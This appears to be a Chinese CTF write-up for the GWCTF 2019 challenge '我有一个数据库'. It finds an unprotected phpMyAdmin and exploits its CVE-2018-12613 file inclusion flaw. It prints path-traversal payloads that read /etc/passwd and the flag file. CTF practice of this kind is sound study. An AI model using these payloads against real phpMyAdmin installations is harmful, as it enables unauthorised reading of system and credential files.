[GWCTF 2019]我有一个数据库

[GWCTF 2019]我有一个数据库

御剑扫一波

http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/robots.txt
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/tbl_create.php
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/config.inc.php

robots.txt里面提示了phpinfo.php
在这里插入图片描述
访问了一下没啥东西。

再访问了一下phpmyadmin

好家伙,直接进后台,密码都没的。

查看版本号

查看了一下服务器配置:
在这里插入图片描述
这里涉及到一个cve漏洞:
phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞

直接打payload

?target=db_datadict.php%253f/../../../../../../../../etc/passwd

在这题的payload:

http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../flag

在这里插入图片描述

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/shenjuxian/p/13927799.html